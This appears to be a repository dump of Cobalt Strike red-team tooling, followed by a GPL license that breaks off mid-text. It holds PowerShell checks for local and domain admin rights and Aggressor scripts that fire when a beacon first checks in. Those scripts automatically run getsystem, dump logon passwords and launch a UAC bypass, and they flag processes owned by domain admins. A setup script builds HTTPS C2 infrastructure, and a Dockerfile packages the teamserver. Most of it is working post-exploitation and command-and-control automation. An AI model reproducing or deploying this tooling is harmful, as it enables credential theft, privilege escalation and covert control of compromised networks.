├── CheckLAdminContext.ps1 ├── DA-Watch.cna ├── Dockerfile ├── HTTPsC2DoneRight.sh ├── Initial-DACheck.cna ├── Initial-LAdminCheck.cna ├── Invoke-DACheck.ps1 ├── LICENSE ├── Malleable-C2-Profiles └── googlesearch.profile ├── README.md ├── cs-install.sh └── host └── dnscheckin.cna /CheckLAdminContext.ps1: -------------------------------------------------------------------------------- 1 | # For: Cobalt Stike Admin Checks 2 | # @Killswitch-GUI 3 | # Ref: http://stackoverflow.com/questions/18674801/administrative-privileges 4 | # http://www.fixitscripts.com/problems/script-to-detect-current-user-and-determine-if-that-user-is-a-local-admin-or-not 5 | 6 | function Invoke-LocalAdminCheck { 7 | <# 8 | .SYNOPSIS 9 | Checks to see if current user is the local Admin group and returns a string to console for Cobalt strike to grab. 10 | This Allows me to automat Bypass UAC and Getsystem 11 | 12 | .PARAMETER Initial 13 | Decalre if the commmand was run from the CS terminal or on intial load of agent. 14 | #> 15 | [cmdletbinding()] 16 | param( 17 | [Parameter(Position=0,ValueFromPipeline=$true)] 18 | [String[]] 19 | $Initial 20 | ) 21 | process { 22 | $User = [Security.Principal.WindowsIdentity]::GetCurrent() 23 | $IsAdmin = (New-Object Security.Principal.WindowsPrincipal $User).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) 24 | $SecondCheck = Get-SecondCheck 25 | If ($IsAdmin -or $SecondCheck) 26 | { 27 | If ($Initial) 28 | { 29 | write-output "[!] Agent-Started-in-LocalAdmin-Context" 30 | } 31 | Else 32 | { 33 | write-output "[!] Currently-in-LocalAdmin-Context" 34 | } 35 | 36 | } 37 | Else 38 | { 39 | write-output "[!] Current-User-Not-LocalAdmin-Context" 40 | } 41 | } 42 | } 43 | 44 | function Get-SecondCheck { 45 | <# 46 | .SYNOPSIS 47 | Checks to see if current user is the local Admin group and returns a string to console for Cobalt strike to grab. 48 | This Allows me to automat Bypass UAC and Getsystem 49 | 50 | .PARAMETER Initial 51 | Decalre if the commmand was run from the CS terminal or on intial load of agent. 52 | #> 53 | process { 54 | Try { 55 | $admUsers = @() 56 | $curUser = $env:username 57 | $strComputer = "." 58 | $computer = [ADSI]("WinNT://" + $strComputer + ",computer") 59 | $Group = $computer.psbase.children.find("Administrators") 60 | $members= $Group.psbase.invoke("Members") | %{$_.GetType().InvokeMember("Name", 'GetProperty', $null, $_, $null)} 61 | ForEach($user in $members) { 62 | $admUsers += $user 63 | } 64 | if(($admUsers -contains $curUser) -eq $True) { 65 | return $true 66 | } 67 | else { 68 | return $false 69 | } 70 | } 71 | Catch { 72 | write-output "Script Check Failed" 73 | } 74 | } 75 | 76 | } 77 | -------------------------------------------------------------------------------- /DA-Watch.cna: -------------------------------------------------------------------------------- 1 | # @Bretiz 2 | 3 | global('@domain_admins'); 4 | global('$listening'); 5 | @domain_admins = @("administrator", "jay"); 6 | $listening = 1; 7 | 8 | sub addDA { 9 | if ($1 !in @domain_admins) { 10 | add(@domain_admins, $1); 11 | println("Added $1 to Domain Admins"); 12 | } 13 | else { 14 | println("$1 is already in Domain Admins"); 15 | } 16 | } 17 | 18 | sub removeDA { 19 | if ($1 in @domain_admins){ 20 | @rem = @($1); 21 | @domain_admins = removeAll(@domain_admins, @rem); 22 | println("Removed $1 from Domain Admins"); 23 | } 24 | else { 25 | println("$1 is not in Domain Admins"); 26 | } 27 | } 28 | 29 | sub checkDA { 30 | # strip off " *" if we get a privileged beacon 31 | $n = replace($user, '\Q *\E', ''); 32 | if ($n in @domain_admins) { 33 | elog("Beacon with DA $user in PID: $pid"); 34 | } 35 | } 36 | 37 | sub parseDA { 38 | $out = $1; 39 | @lines = split('\n', $out); 40 | foreach $line (@lines) { 41 | $line = replace($line, '[\r\n]', ''); 42 | $line = replace($line, 'received output:', ''); 43 | $line = replace($line, 'Group name\p{Space}*Domain Admins', ''); 44 | $line = replace($line, 'The command completed successfully.', ''); 45 | $line = replace($line, 'Comment\p{Space}.*',''); 46 | $line = replace($line, 'Members.*', ''); 47 | $line = replace($line, '--------.*', ''); 48 | } 49 | remove(@lines, ''); 50 | @lines = join('', @lines); 51 | @lines = split('\s+', @lines); 52 | remove(@lines, ''); 53 | println(@lines); 54 | foreach $u (@lines) { 55 | addDA($u); 56 | } 57 | } 58 | 59 | command uaddDA { 60 | addDA($1); 61 | } 62 | 63 | command uremDA { 64 | removeDA($1); 65 | } 66 | command ulistDA { 67 | printAll(@domain_admins); 68 | } 69 | 70 | command uhookStatus { 71 | hookStatus(); 72 | } 73 | 74 | sub hookStatus { 75 | if ($listening) { 76 | println("Beacon output will be parsed for Domain Admins."); 77 | } else { 78 | println("Beacon output will not be parsed."); 79 | } 80 | } 81 | 82 | command uhookOn { 83 | $listening = 1; 84 | hookStatus(); 85 | } 86 | 87 | command uhookOff { 88 | $listening = 0; 89 | hookStatus(); 90 | } 91 | 92 | on beacon_initial { 93 | $u = beacon_info($1, "user"); 94 | $p = beacon_info($1, "pid"); 95 | checkDA($user => $u, $pid => $p); 96 | } 97 | 98 | on credentials { 99 | @creds = $1; 100 | @unames = @(""); 101 | foreach $cred (@creds) { 102 | add(@unames, $cred['user']); 103 | } 104 | 105 | foreach $da (@domain_admins) { 106 | if ($da in @unames) { 107 | println("Credentials store has DA $da"); 108 | } 109 | } 110 | } 111 | 112 | on beacon_output { 113 | if ($listening){ 114 | $out = $2; 115 | if (('Domain Admins' isin $out) && ('The command completed successfully.' isin $out)) { 116 | parseDA($out); 117 | } 118 | } 119 | } 120 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | # BUILD INSTRUCTIONS & README 2 | # POST HERE: https://blog.obscuritylabs.com/docker-command-controll-c2/ 3 | # 1) docker build --build-arg cskey="xxxx-xxxx-xxxx-xxxx" -t cobaltstrike/cs . 4 | # 2) docker run -d -p 192.168.2.238:50050:50050 cobaltstrike/cs 192.168.2.238 password 5 | # - This runs docker in Detached mode, to tshoot issues or see logs do the following 6 | # 3) docker logs -f {docker ps -> CONTAINER ID} 7 | # - Example: docker logs -f 38830d90537f 8 | # NOTE: you can eaily name the docker like so as well: 9 | # - docker run -d -p 192.168.2.238:50050:50050 --name "war_games" cobaltstrike/cs 192.168.2.238 password 10 | # - docker logs -f "war_games" 11 | # - To kill CS: docker kill war_games 12 | # NOTE: to go interactive we need to bypass the ENTRYPOINT 13 | # - docker run -ti --entrypoint "" cobaltstrike/cs bash 14 | FROM ubuntu:16.04 15 | 16 | # Dockerfile metadata 17 | MAINTAINER Killswitch-GUI 18 | LABEL version="1.0" 19 | LABEL description="Dockerfile base for CobaltStrike." 20 | 21 | # setup local env 22 | ARG cskey 23 | ENV cs_key ${cskey} 24 | ENV JAVA_HOME /opt/jdk-10.0.2 25 | ENV PATH $PATH:$JAVA_HOME/bin 26 | 27 | # docker hardcoded sh... 28 | SHELL ["/bin/bash", "-c"] 29 | 30 | # install proper tools 31 | RUN apt-get update && \ 32 | apt-get install -y wget curl net-tools sudo 33 | 34 | # install oracle jave 35 | RUN cd /opt && \ 36 | wget -c --header 'Cookie: oraclelicense=accept-securebackup-cookie' http://download.oracle.com/otn-pub/java/jdk/10.0.2+13/19aef61b38124481863b1413dce1855f/jdk-10.0.2_linux-x64_bin.tar.gz && \ 37 | tar xvf jdk-10.0.2_linux-x64_bin.tar.gz && \ 38 | cd jdk-10.0.2 && \ 39 | source /etc/bash.bashrc && \ 40 | sudo update-alternatives --install '/usr/bin/java' 'java' '/opt/jdk-10.0.2/bin/java' 1 && \ 41 | sudo update-alternatives --install '/usr/bin/javac' 'javac' '/opt/jdk-10.0.2/bin/javac' 1 && \ 42 | sudo update-alternatives --set 'java' '/opt/jdk-10.0.2/bin/java' && \ 43 | sudo update-alternatives --set 'javac' '/opt/jdk-10.0.2/bin/javac' 44 | 45 | # install CobaltStrike with license key and update 46 | RUN var=$(curl 'https://www.cobaltstrike.com/download' -XPOST -H 'Referer: https://www.cobaltstrike.com/download' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: https://www.cobaltstrike.com' -H 'Host: www.cobaltstrike.com' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Connection: keep-alive' -H 'Accept-Language: en-us' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5' --data "dlkey=$cs_key" | sed -n 's/.*href="\([^"]*\).*/\1/p' | grep /downloads/ | cut -d '.' -f 1) && \ 47 | cd /opt && \ 48 | wget https://www.cobaltstrike.com$var.tgz && \ 49 | tar xvf cobaltstrike-trial.tgz && \ 50 | cd cobaltstrike && \ 51 | echo $cs_key > ~/.cobaltstrike.license && \ 52 | ./update 53 | 54 | # cleanup image 55 | RUN apt-get -y clean && \ 56 | apt-get -y autoremove 57 | 58 | # set entry point 59 | WORKDIR "/opt/cobaltstrike" 60 | ENTRYPOINT ["./teamserver"] 61 | -------------------------------------------------------------------------------- /HTTPsC2DoneRight.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Refs: 3 | # http://stackoverflow.com/questions/11617210/how-to-properly-import-a-selfsigned-certificate-into-java-keystore-that-is-avail 4 | # https://www.digitalocean.com/community/tutorials/how-to-secure-apache-with-let-s-encrypt-on-ubuntu-14-04 5 | # http://www.advancedpentest.com/help-malleable-c2 6 | # https://maximilian-boehm.com/hp2121/Create-a-Java-Keystore-JKS-from-Let-s-Encrypt-Certificates.htm 7 | 8 | # Global Variables 9 | runuser=$(whoami) 10 | tempdir=$(pwd) 11 | # Echo Title 12 | clear 13 | echo '==========================================================================' 14 | echo ' HTTPS C2 Done Right Setup Script | [Updated]: 2016' 15 | echo '==========================================================================' 16 | echo ' [Web]: Http://CyberSyndicates.com | [Twitter]: @KillSwitch-GUI' 17 | echo '==========================================================================' 18 | 19 | 20 | echo -n "Enter your DNS (A) record for domain [ENTER]: " 21 | read domain 22 | echo 23 | 24 | echo -n "Enter your common password to be used [ENTER]: " 25 | read password 26 | echo 27 | 28 | echo -n "Enter your CobaltStrike server location [ENTER]: " 29 | read cobaltStrike 30 | echo 31 | 32 | domainPkcs="$domain.p12" 33 | domainStore="$domain.store" 34 | cobaltStrikeProfilePath="$cobaltStrike/httpsProfile" 35 | 36 | 37 | # Environment Checks 38 | func_check_env(){ 39 | # Check Sudo Dependency going to need that! 40 | if [ $(id -u) -ne '0' ]; then 41 | echo 42 | echo ' [ERROR]: This Setup Script Requires root privileges!' 43 | echo ' Please run this setup script again with sudo or run as login as root.' 44 | echo 45 | exit 1 46 | fi 47 | } 48 | 49 | func_check_tools(){ 50 | # Check Sudo Dependency going to need that! 51 | if [ $(which keytool) ]; then 52 | echo '[Sweet] java keytool is installed' 53 | else 54 | echo 55 | echo ' [ERROR]: keytool does not seem to be installed' 56 | echo 57 | exit 1 58 | fi 59 | if [ $(which openssl) ]; then 60 | echo '[Sweet] openssl keytool is installed' 61 | else 62 | echo 63 | echo ' [ERROR]: openssl does not seem to be installed' 64 | echo 65 | exit 1 66 | fi 67 | if [ $(which git) ]; then 68 | echo '[Sweet] git keytool is installed' 69 | else 70 | echo 71 | echo ' [ERROR]: git does not seem to be installed' 72 | echo 73 | exit 1 74 | fi 75 | } 76 | 77 | func_apache_check(){ 78 | # Check Sudo Dependency going to need that! 79 | 80 | # if [ sudo lsof -nPi | grep ":80 (LISTEN)" ]; then 81 | # echo 82 | # echo ' [ERROR]: This Setup Script Requires that port!' 83 | # echo ' 80 not be in use.' 84 | # echo 85 | # exit 1 86 | if [ $(which java) ]; then 87 | echo '[Sweet] java is already installed' 88 | echo 89 | else 90 | apt-get update 91 | apt-get install default-jre -y 92 | echo '[Success] java is now installed' 93 | echo 94 | fi 95 | if [ $(which apache2) ]; then 96 | echo '[Sweet] Apache2 is already installed' 97 | service apache2 start 98 | echo 99 | else 100 | apt-get update 101 | apt-get install apache2 -y 102 | echo '[Success] Apache2 is now installed' 103 | echo 104 | service apache2 restart 105 | service apache2 start 106 | fi 107 | if [ $(lsof -nPi | grep -i apache | grep -c ":80 (LISTEN)") -ge 1 ]; then 108 | echo '[Success] Apache2 is up and running!' 109 | else 110 | echo 111 | echo ' [ERROR]: Apache2 does not seem to be running on' 112 | echo ' port 80? Try manual start?' 113 | echo 114 | exit 1 115 | fi 116 | if [ $(which ufw) ]; then 117 | echo 'Looks like UFW is installed, opening ports 80 and 443' 118 | ufw allow 80/tcp 119 | ufw allow 443/tcp 120 | echo 121 | fi 122 | } 123 | 124 | func_install_letsencrypt(){ 125 | echo '[Starting] cloning into letsencrypt!' 126 | git clone https://github.com/certbot/certbot /opt/letsencrypt 127 | echo '[Success] letsencrypt is built!' 128 | cd /opt/letsencrypt 129 | echo '[Starting] to build letsencrypt cert!' 130 | ./letsencrypt-auto --apache -d $domain -n --register-unsafely-without-email --agree-tos 131 | if [ -e /etc/letsencrypt/live/$domain/fullchain.pem ]; then 132 | echo '[Success] letsencrypt certs are built!' 133 | else 134 | echo "[ERROR] letsencrypt certs failed to build. Check that DNS A record is properly configured for this domain" 135 | exit 1 136 | fi 137 | } 138 | 139 | func_build_pkcs(){ 140 | cd /etc/letsencrypt/live/$domain 141 | echo '[Starting] Building PKCS12 .p12 cert.' 142 | openssl pkcs12 -export -in fullchain.pem -inkey privkey.pem -out $domainPkcs -name $domain -passout pass:$password 143 | echo '[Success] Built $domainPkcs PKCS12 cert.' 144 | echo '[Starting] Building Java keystore via keytool.' 145 | keytool -importkeystore -deststorepass $password -destkeypass $password -destkeystore $domainStore -srckeystore $domainPkcs -srcstoretype PKCS12 -srcstorepass $password -alias $domain 146 | echo '[Success] Java keystore $domainStore built.' 147 | mkdir $cobaltStrikeProfilePath 148 | cp $domainStore $cobaltStrikeProfilePath 149 | echo '[Success] Moved Java keystore to CS profile Folder.' 150 | } 151 | 152 | func_build_c2(){ 153 | cd $cobaltStrikeProfilePath 154 | echo '[Starting] Cloning into amazon.profile for testing.' 155 | wget https://raw.githubusercontent.com/rsmudge/Malleable-C2-Profiles/master/normal/amazon.profile --no-check-certificate -O amazon.profile 156 | echo '[Success] amazon.profile clonned.' 157 | echo '[Starting] Adding java keystore / password to amazon.profile.' 158 | echo " " >> amazon.profile 159 | echo 'https-certificate {' >> amazon.profile 160 | echo set keystore \"$domainStore\"\; >> amazon.profile 161 | echo set password \"$password\"\; >> amazon.profile 162 | echo '}' >> amazon.profile 163 | echo '[Success] amazon.profile updated with HTTPs settings.' 164 | } 165 | # Menu Case Statement 166 | case $1 in 167 | *) 168 | func_check_env 169 | func_check_tools 170 | func_apache_check 171 | func_install_letsencrypt 172 | func_build_pkcs 173 | func_build_c2 174 | ;; 175 | esac 176 | -------------------------------------------------------------------------------- /Initial-DACheck.cna: -------------------------------------------------------------------------------- 1 | # quickly run powershellimport 2 | sub powershellimport { 3 | bpowershell_import($1, script_resource("Invoke-DACheck.ps1")); 4 | } 5 | 6 | alias checkda { 7 | powershellimport($1); 8 | bpowershell($1, 'Invoke-DACheck'); 9 | } 10 | 11 | # register the GetDa command 12 | beacon_command_register( 13 | "checkda", 14 | "Checks if the current user is in the DA Group", 15 | "Synopsis: echo [no arguments]\n\nChecks using Powershell that supports (2.0 or later with 3.5 .NET) \n or (PS 4.0 or later) to perform Domain Group queries."); 16 | 17 | # set up the Initial check 18 | on beacon_initial { 19 | powershellimport($1); 20 | bpowershell($1, 'Invoke-DACheck -Initial True'); 21 | $a = binfo($1, "user"); 22 | $b = "*"; 23 | if ($b isin $a) 24 | { 25 | bgetsystem($1); 26 | blogonpasswords($1); 27 | } 28 | } 29 | 30 | 31 | #NEED TO SETUP A CHECK ARRAY FOR PAST DA FINDS 32 | # set up event consumer to search for specfic pattern 33 | # if found alert them via Elog and box 34 | on beacon_output { 35 | $s = replace($2, 'received output:\n'.''); 36 | # println($s); 37 | $f = "[!] Found-DA-User:"; 38 | if ($f isin $s) 39 | { 40 | $pid = binfo($1, "pid"); 41 | elog("Found DA User at Pid: $pid"); 42 | show_message("Found DA User at Pid: $pid"); 43 | beacon_note($1, "DA User on this box"); 44 | } 45 | } 46 | 47 | # bpowershell($1, '$user = [Security.Principal.WindowsIdentity]::GetCurrent();(New-Object Security.Principal. 48 | # WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)'); 49 | 50 | -------------------------------------------------------------------------------- /Initial-LAdminCheck.cna: -------------------------------------------------------------------------------- 1 | # @Killswitch-GUI 2 | # This script will Auto check for LocalAdmin User on intial agent 3 | 4 | # quickly run powershellimport 5 | sub powershellimport { 6 | bpowershell_import($1, script_resource("CheckLAdminContext.ps1")); 7 | } 8 | 9 | alias checkla { 10 | powershellimport($1); 11 | bpowershell($1, 'Invoke-LocalAdminCheck'); 12 | } 13 | 14 | # register the checkla command 15 | beacon_command_register( 16 | "checkla", 17 | "Checks if the current user is in a Local-Admin Context", 18 | "Synopsis: checkla [no arguments]\n\nChecks using Powershell that supports (2.0 or later with 3.5 .NET) \n or (PS 4.0 or later) to perform a local admin check of current user."); 19 | 20 | # set up the Initial check 21 | on beacon_initial { 22 | $a = binfo($1, "user"); 23 | $b = "*"; 24 | if ($b isin $a) 25 | { 26 | blogonpasswords($1); 27 | beacon_note($1, "Elevated Context: Ran LogonPasswords"); 28 | } 29 | else 30 | { 31 | powershellimport($1); 32 | bpowershell($1, 'Invoke-LocalAdminCheck -Initial True'); 33 | } 34 | } 35 | 36 | on beacon_output { 37 | $s = replace($2, 'received output:\n'.''); 38 | # println($s); 39 | $f = "[!] Agent-Started-in-LocalAdmin"; 40 | if ($f isin $s) 41 | { 42 | $pid = binfo($1, "pid"); 43 | elog("Initial Beacon is LocalAdmin at: $pid"); 44 | # beacon_note($1, "Elevated Context: Ran Logon"); 45 | $lis = listeners_local(); 46 | bbypassuac($1, $lis[0]); 47 | } 48 | } 49 | 50 | # All intial beacons run script 51 | # event triggers on output 52 | # if it matches known string it executes logic 53 | # if intial matches a * in name it executes logic 54 | -------------------------------------------------------------------------------- /Invoke-DACheck.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-DACheck { 2 | <# 3 | .SYNOPSIS 4 | Checks to see if current user is in DA Groups and if he is returns a specfic string alerting user that they are DA for Automated purposes. 5 | 6 | .PARAMETER Initial 7 | Enables a share Anyone can Read/Write to. 8 | #> 9 | [cmdletbinding()] 10 | param( 11 | [Parameter(Position=0,ValueFromPipeline=$true)] 12 | [String[]] 13 | $Initial 14 | ) 15 | process { 16 | # Returns list of process owners 17 | $User = Get-User 18 | # Returns list of domain admins 19 | $DomainAdmins = Get-DomainAdmins 20 | # Loop through Process Owners 21 | ForEach ($DomainUser in $DomainAdmins) 22 | { 23 | if($User -match $DomainUser) 24 | { 25 | if($Initial) 26 | { 27 | Write-Output "[!] Found-DA-User: $DomainUser" 28 | } 29 | else 30 | { 31 | Write-Output "[!] Found-DA-User: $DomainUser" 32 | } 33 | } 34 | 35 | } 36 | } 37 | } 38 | 39 | function Get-DomainAdmins { 40 | <# 41 | .SYNOPSIS 42 | Montiotrs the current DA accounts and alerts the desired admin if a change where to take place whithin the group. 43 | 44 | .PARAMETER CheckRate 45 | Pass me a command in a Variable. 46 | 47 | .PARAMETER EmailAdress 48 | Pass me a command in a Variable. 49 | #> 50 | [CmdletBinding()] 51 | param( 52 | [Parameter(ValueFromPipeline=$True)] 53 | [string]$Command 54 | ) 55 | process 56 | { 57 | $groupname = 'Domain Admins' 58 | $DAUsers = (New-Object System.DirectoryServices.DirectoryEntry((New-Object System.DirectoryServices.DirectorySearcher("(&(objectCategory=Group)(name=$($groupname)))")).FindOne().GetDirectoryEntry().Path)).member | % { (New-Object System.DirectoryServices.DirectoryEntry("LDAP://"+$_)) } | foreach {$_.sAMAccountName} 59 | return $DAUsers 60 | } 61 | } 62 | 63 | 64 | function Get-User { 65 | <# 66 | .SYNOPSIS 67 | Montiotrs the current DA accounts and alerts the desired admin if a change where to take place whithin the group. 68 | #> 69 | process { 70 | # This retrieves all running processes that are not running as local system and such 71 | $ProcessOwner = @{} 72 | Get-WmiObject win32_process | ForEach-Object {$ProcessOwner[$_.handle] = $_.getowner().user} 73 | $ProcessOwnerList = Get-Process | Select-Object Id, @{l="Owner";e={$ProcessOwner[$_.id.ToString()]}} | Where-Object {!($ProcessOwner[$_.id.ToString()] -match "(?:SYSTEM|(?:LOCAL|NETWORK) SERVICE)")} 74 | $Output = $ProcessOwnerList | Select-Object Owner -Unique 75 | return $Output 76 | 77 | 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you 